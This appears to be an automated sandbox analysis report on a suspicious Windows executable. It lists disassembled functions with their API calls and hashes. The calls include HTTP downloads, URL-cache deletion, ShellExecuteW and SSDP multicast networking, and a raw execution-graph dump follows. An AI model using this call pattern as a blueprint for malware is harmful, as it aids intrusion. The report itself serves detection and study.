                                              • Opcode Fuzzy Hash: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction Fuzzy Hash: 6101D6765003009BCB20AF51ECC0E9B7779AF48311704467AFD04AB396C738E84187B9
                                              APIs
                                              • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                              • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                              • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                              APIs
                                              • ioctlsocket.WS2_32 ref: 0040112B
                                              • recvfrom.WS2_32 ref: 0040119C
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                              • String ID:
                                              • API String ID: 3980219359-0
                                              • Opcode ID: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction ID: e1b7ef358c802af59afb00f280b99e3e8e19274dac2adc7c4e0c886c1a13037e
                                              • Opcode Fuzzy Hash: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction Fuzzy Hash: 1521C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF555A62A0E774DD488BEA
                                              APIs
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                              • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                              • WSAGetLastError.WS2_32 ref: 00401FB9
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                              • String ID:
                                              • API String ID: 2074799992-0
                                              • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                              • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                              APIs
                                              • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                              • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                              • Sleep.KERNEL32(000003E8), ref: 00407361
                                              • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CacheDeleteEntry$Sleep
                                              • String ID:
                                              • API String ID: 672405725-0
                                              • Opcode ID: de31647e4212ff5a036519ed2976cc2a7ac52ffd671279e5da701e067ce87bdf
                                              • Instruction ID: 2037616d4c8183bc1dcd880db7f677971b3714fceeeaba453b7e7dde7ca31e21
                                              • Opcode Fuzzy Hash: de31647e4212ff5a036519ed2976cc2a7ac52ffd671279e5da701e067ce87bdf
                                              • Instruction Fuzzy Hash: CC217F75E04208FBDB04DFA4D885B9EBB74AF45305F10C1B9ED016B391D679AA80DB49
                                              APIs
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                              • WSAGetLastError.WS2_32 ref: 00401B12
                                              • Sleep.KERNEL32(00000001), ref: 00401B28
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Send$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 2121970615-0
                                              • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                              • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                              • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                              • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 0040D9B9
                                              • CloseHandle.KERNEL32(?), ref: 0040D9E8
                                              • LeaveCriticalSection.KERNEL32(?), ref: 0040D9F7
                                              • DeleteCriticalSection.KERNEL32(?), ref: 0040DA04
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                              • String ID:
                                              • API String ID: 3102160386-0
                                              • Opcode ID: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction ID: da3f5db6e059a7c592b49e611c360a1232ff957d222e4d531544d3c603d0b457
                                              • Opcode Fuzzy Hash: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction Fuzzy Hash: 2A1121B4E00208EBDB08DF94D984A9DB775FF44309F1081A9E806A7341D739EF95DB85
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                              • String ID:
                                              • API String ID: 2223660684-0
                                              • Opcode ID: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction ID: 660f416c0ba452cd5c41a421238d9990710d8623252f526507a58679470d43f9
                                              • Opcode Fuzzy Hash: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction Fuzzy Hash: 2301F27A242300AFC3209F26ED84A9B73F8AF85B11F00443EE546E3A50DB39E401CB28
                                              APIs
                                                • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                              • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFreeInstanceString
                                              • String ID: Microsoft Corporation
                                              • API String ID: 586785272-3838278685
                                              • Opcode ID: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction ID: e6ff3ca51e6e637cb53d631dd4329f9e07d4b07e7a8aed38044ad589faa32fb5
                                              • Opcode Fuzzy Hash: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction Fuzzy Hash: 0F91EC75A0410ADFCB04DF98C894AAFB3B5BF89304F208169E515BB3E0D774AD41CBA6
                                              APIs
                                                • Part of subcall function 0040E150: memset.NTDLL ref: 0040E178
                                                • Part of subcall function 0040E150: InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                                • Part of subcall function 0040E150: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                                • Part of subcall function 0040E150: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                                • Part of subcall function 0040E150: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                                • Part of subcall function 0040E150: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                                • Part of subcall function 0040E150: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                                • Part of subcall function 0040E150: InternetCloseHandle.WININET(00000000), ref: 0040E347
                                                • Part of subcall function 0040E040: SysAllocString.OLEAUT32(00000000), ref: 0040E06E
                                                • Part of subcall function 0040E040: CoCreateInstance.OLE32(00412A18,00000000,00004401,00412A08,00000000), ref: 0040E096
                                                • Part of subcall function 0040E040: SysFreeString.OLEAUT32(00000000), ref: 0040E131
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                              • String ID: %S%S
                                              • API String ID: 1017111014-3267608656
                                              • Opcode ID: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction ID: 0d7a9dfb02ef55e8037a527aa51067439edd5703c05fc0bf7ce6e387078fb77b
                                              • Opcode Fuzzy Hash: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction Fuzzy Hash: 3E416BB5E002099FCB04DBE5C885AEFB7B4BF88304F108929E505B7391D778AA45CBA1
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407FB2), ref: 0040DBDA
                                                • Part of subcall function 0040DCA0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                                • Part of subcall function 0040DCA0: htons.WS2_32(0000076C), ref: 0040DCF0
                                                • Part of subcall function 0040DCA0: inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                                • Part of subcall function 0040DCA0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040DCA0: bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                                • Part of subcall function 0040DCA0: lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                                • Part of subcall function 0040DCA0: sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                                • Part of subcall function 0040DCA0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                              • String ID: TCP$UDP
                                              • API String ID: 1519345861-1097902612
                                              • Opcode ID: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction ID: a00cbb5bcfca6c5959655f637b3ec774768ac2685424fa301eff230043eb3e38
                                              • Opcode Fuzzy Hash: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction Fuzzy Hash: A011B4B4D04208EBEB00EBD4DD85FAE7774EB44308F14886EE511772C2D6B86A54DB59
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,?,00000000,?), ref: 00405E5F
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                              • LeaveCriticalSection.KERNEL32(004174D8), ref: 00405F30
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSectionmemcpy$EnterLeave
                                              • String ID:
                                              • API String ID: 469056452-0
                                              • Opcode ID: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction ID: 40e991b6b4618cd04087b2a5cfa683f62b0bf83616b4f0bda180c9645beb9567
                                              • Opcode Fuzzy Hash: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction Fuzzy Hash: C2218B70904208ABCB04DB94D885BDEBBB5EB94304F1481BAE845672C1C77CAA85CB9A

                                              Execution Graph

                                              Execution Coverage:15.1%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:1486
                                              Total number of Limit Nodes:39
40d8b0 4550->4555 4551->4466 4552 40d8c9 EnterCriticalSection 4552->4555 4553 40d937 LeaveCriticalSection 4553->4555 4557 40d94e 4553->4557 4554 40d913 WaitForSingleObject 4554->4555 4555->4551 4555->4552 4555->4553 4555->4554 4556 40d96c Sleep 4555->4556 4555->4557 4556->4555 4557->4551 4559 4075e8 4558->4559 4559->4393 4559->4394 4561 40ef81 ShellExecuteW 4560->4561 4562 40ef72 Sleep 4560->4562 4563 40efb6 4561->4563 4564 40efa7 Sleep 4561->4564 4565 4076cb 4562->4565 4563->4565 4564->4565 4565->4398 4565->4425 4567 40806e 4566->4567 4568 40d9ac EnterCriticalSection 4566->4568 4567->4443 4569 40d9c8 4568->4569 4570 40d9f0 LeaveCriticalSection DeleteCriticalSection 4569->4570 4571 40d9db CloseHandle 4569->4571 4572 40a740 _invalid_parameter 3 API calls 4570->4572 4571->4569 4573 40da16 4572->4573 4574 40a740 _invalid_parameter 3 API calls 4573->4574 4574->4567 4578 40c980 4575->4578 4579 40c9b3 4578->4579 4580 40c99e 4578->4580 4582 407ef7 4579->4582 4584 40cb60 4579->4584 4618 40c9e0 4580->4618 4582->4443 4582->4444 4585 40cb89 4584->4585 4586 40cc3a 4584->4586 4617 40cc32 4585->4617 4644 40a320 4585->4644 4589 40a320 7 API calls 4586->4589 4586->4617 4590 40cc5e 4589->4590 4593 402420 7 API calls 4590->4593 4590->4617 4595 40cc82 4593->4595 4594 40a320 7 API calls 4596 40cbd2 4594->4596 4597 40a320 7 API calls 4595->4597 4652 4024e0 4596->4652 4599 40cc91 4597->4599 4601 4024e0 10 API calls 4599->4601 4600 40cbfb 4655 40a740 4600->4655 4603 40ccba 4601->4603 4605 40a740 _invalid_parameter 3 API calls 4603->4605 4607 40ccc6 4605->4607 4606 402420 7 API calls 4608 40cc18 4606->4608 4609 402420 7 API calls 4607->4609 4610 4024e0 10 API calls 4608->4610 4611 40ccd7 4609->4611 4610->4617 4612 4024e0 10 API calls 4611->4612 4613 40ccf1 4612->4613 4614 402420 7 API calls 4613->4614 4615 40cd02 4614->4615 4616 4024e0 10 API calls 4615->4616 4616->4617 4617->4582 4620 40ca92 4618->4620 4621 40ca09 4618->4621 4619 40ca8a 4619->4582 4620->4619 4623 40a320 7 API calls 
4620->4623 4621->4619 4622 40a320 7 API calls 4621->4622 4624 40ca1c 4622->4624 4625 40cab8 4623->4625 4624->4619 4626 402420 7 API calls 4624->4626 4625->4619 4627 402420 7 API calls 4625->4627 4628 40ca45 4626->4628 4629 40cae5 4627->4629 4630 4024e0 10 API calls 4628->4630 4631 4024e0 10 API calls 4629->4631 4632 40ca5f 4630->4632 4633 40caff 4631->4633 4634 402420 7 API calls 4632->4634 4635 402420 7 API calls 4633->4635 4636 40ca70 4634->4636 4637 40cb10 4635->4637 4638 4024e0 10 API calls 4636->4638 4639 4024e0 10 API calls 4637->4639 4638->4619 4640 40cb2a 4639->4640 4641 402420 7 API calls 4640->4641 4642 40cb3b 4641->4642 4643 4024e0 10 API calls 4642->4643 4643->4619 4662 40a340 4644->4662 4647 402420 4683 40a530 4647->4683 4690 402540 4652->4690 4654 4024ff __aligned_recalloc_base 4654->4600 4700 40a3e0 GetCurrentProcessId 4655->4700 4657 40a74b 4658 40a752 4657->4658 4701 40a680 4657->4701 4658->4606 4661 40a767 HeapFree 4661->4658 4671 40a3e0 GetCurrentProcessId 4662->4671 4664 40a34b 4667 40a357 __aligned_recalloc_base 4664->4667 4672 40a400 4664->4672 4666 40a32e 4666->4617 4666->4647 4667->4666 4668 40a372 RtlAllocateHeap 4667->4668 4668->4666 4669 40a399 __aligned_recalloc_base 4668->4669 4669->4666 4670 40a3b4 memset 4669->4670 4670->4666 4671->4664 4680 40a3e0 GetCurrentProcessId 4672->4680 4674 40a409 4675 40a426 HeapCreate 4674->4675 4681 40a470 GetProcessHeaps 4674->4681 4677 40a440 HeapSetInformation GetCurrentProcessId 4675->4677 4678 40a467 4675->4678 4677->4678 4678->4667 4680->4674 4682 40a41c 4681->4682 4682->4675 4682->4678 4684 40a340 __aligned_recalloc_base 7 API calls 4683->4684 4685 40242b 4684->4685 4686 402820 4685->4686 4687 40282a 4686->4687 4688 40a530 __aligned_recalloc_base 7 API calls 4687->4688 4689 402438 4688->4689 4689->4594 4691 40258e 4690->4691 4692 402551 4690->4692 4691->4692 4693 40a530 __aligned_recalloc_base 7 API calls 4691->4693 4692->4654 4696 4025b2 _invalid_parameter 4693->4696 4694 4025e2 memcpy 4695 402606 
_invalid_parameter 4694->4695 4697 40a740 _invalid_parameter 3 API calls 4695->4697 4696->4694 4698 40a740 _invalid_parameter 3 API calls 4696->4698 4697->4692 4699 4025df 4698->4699 4699->4694 4700->4657 4702 40a6b0 HeapValidate 4701->4702 4703 40a6d0 4701->4703 4702->4703 4703->4658 4703->4661 4721 40a7b0 4704->4721 4707 40cdf1 4707->4482 4710 40a740 _invalid_parameter 3 API calls 4710->4707 4934 40a570 4711->4934 4714 405cca memcpy 4716 40a7b0 8 API calls 4714->4716 4715 405d88 4715->4482 4717 405d01 4716->4717 4944 40c720 4717->4944 4722 40a7dd 4721->4722 4723 40a530 __aligned_recalloc_base 7 API calls 4722->4723 4724 40a7f2 4722->4724 4725 40a7f4 memcpy 4722->4725 4723->4722 4724->4707 4726 40c2c0 4724->4726 4725->4722 4729 40c2ca 4726->4729 4730 40c301 memcmp 4729->4730 4731 40c328 4729->4731 4732 40a740 _invalid_parameter 3 API calls 4729->4732 4734 40c2e9 4729->4734 4735 40c7b0 4729->4735 4749 408080 4729->4749 4730->4729 4733 40a740 _invalid_parameter 3 API calls 4731->4733 4732->4729 4733->4734 4734->4707 4734->4710 4736 40c7bf __aligned_recalloc_base 4735->4736 4737 40a530 __aligned_recalloc_base 7 API calls 4736->4737 4739 40c7c9 4736->4739 4738 40c858 4737->4738 4738->4739 4740 402420 7 API calls 4738->4740 4739->4729 4741 40c86d 4740->4741 4742 402420 7 API calls 4741->4742 4743 40c875 4742->4743 4745 40c8cd __aligned_recalloc_base 4743->4745 4752 40c920 4743->4752 4757 402470 4745->4757 4748 402470 3 API calls 4748->4739 4865 40a2a0 4749->4865 4753 4024e0 10 API calls 4752->4753 4754 40c934 4753->4754 4763 4026f0 4754->4763 4756 40c94c 4756->4743 4758 402484 _invalid_parameter 4757->4758 4760 4024ce 4757->4760 4761 40a740 _invalid_parameter 3 API calls 4758->4761 4762 4024ac 4758->4762 4759 40a740 _invalid_parameter 3 API calls 4759->4760 4760->4748 4761->4762 4762->4759 4766 402710 4763->4766 4765 40270a 4765->4756 4767 402724 4766->4767 4768 402540 __aligned_recalloc_base 10 API calls 4767->4768 4769 40276d 4768->4769 4770 402540 
__aligned_recalloc_base 10 API calls 4769->4770 4771 40277d 4770->4771 4772 402540 __aligned_recalloc_base 10 API calls 4771->4772 4773 40278d 4772->4773 4774 402540 __aligned_recalloc_base 10 API calls 4773->4774 4775 40279d 4774->4775 4776 4027a6 4775->4776 4777 4027cf 4775->4777 4781 403e20 4776->4781 4798 403df0 4777->4798 4780 4027c7 __aligned_recalloc_base 4780->4765 4782 402820 _invalid_parameter 7 API calls 4781->4782 4783 403e37 4782->4783 4784 402820 _invalid_parameter 7 API calls 4783->4784 4785 403e46 4784->4785 4786 402820 _invalid_parameter 7 API calls 4785->4786 4787 403e55 4786->4787 4788 402820 _invalid_parameter 7 API calls 4787->4788 4797 403e64 _invalid_parameter __aligned_recalloc_base 4788->4797 4790 40400f _invalid_parameter 4791 402850 _invalid_parameter 3 API calls 4790->4791 4792 404035 _invalid_parameter 4790->4792 4791->4790 4793 402850 _invalid_parameter 3 API calls 4792->4793 4794 40405b _invalid_parameter 4792->4794 4793->4792 4795 402850 _invalid_parameter 3 API calls 4794->4795 4796 404081 4794->4796 4795->4794 4796->4780 4797->4790 4801 402850 4797->4801 4805 404090 4798->4805 4800 403e0c 4800->4780 4802 402866 4801->4802 4803 40285b 4801->4803 4802->4797 4804 40a740 _invalid_parameter 3 API calls 4803->4804 4804->4802 4806 4040a6 _invalid_parameter 4805->4806 4807 4040b8 _invalid_parameter 4806->4807 4808 4040dd 4806->4808 4810 404103 4806->4810 4807->4800 4835 403ca0 4808->4835 4811 40413d 4810->4811 4812 40415e 4810->4812 4845 404680 4811->4845 4814 402820 _invalid_parameter 7 API calls 4812->4814 4815 40416f 4814->4815 4816 402820 _invalid_parameter 7 API calls 4815->4816 4817 40417e 4816->4817 4818 402820 _invalid_parameter 7 API calls 4817->4818 4819 40418d 4818->4819 4820 402820 _invalid_parameter 7 API calls 4819->4820 4821 40419c 4820->4821 4858 403d70 4821->4858 4823 402820 _invalid_parameter 7 API calls 4824 4041ca _invalid_parameter 4823->4824 4824->4823 4826 404284 _invalid_parameter __aligned_recalloc_base 4824->4826 
4825 402850 _invalid_parameter 3 API calls 4825->4826 4826->4825 4827 4045a3 _invalid_parameter 4826->4827 4828 402850 _invalid_parameter 3 API calls 4827->4828 4829 4045c9 _invalid_parameter 4827->4829 4828->4827 4830 402850 _invalid_parameter 3 API calls 4829->4830 4831 4045ef _invalid_parameter 4829->4831 4830->4829 4832 402850 _invalid_parameter 3 API calls 4831->4832 4833 404615 _invalid_parameter 4831->4833 4832->4831 4833->4807 4834 402850 _invalid_parameter 3 API calls 4833->4834 4834->4833 4836 403cae 4835->4836 4837 402820 _invalid_parameter 7 API calls 4836->4837 4838 403ccb 4837->4838 4839 402820 _invalid_parameter 7 API calls 4838->4839 4840 403cda _invalid_parameter 4839->4840 4841 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4840->4841 4842 403d3a _invalid_parameter 4840->4842 4841->4840 4843 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4842->4843 4844 403d60 4842->4844 4843->4842 4844->4807 4846 402820 _invalid_parameter 7 API calls 4845->4846 4847 404697 4846->4847 4848 402820 _invalid_parameter 7 API calls 4847->4848 4849 4046a6 4848->4849 4850 402820 _invalid_parameter 7 API calls 4849->4850 4857 4046b5 _invalid_parameter __aligned_recalloc_base 4850->4857 4851 402850 _invalid_parameter GetCurrentProcessId HeapValidate 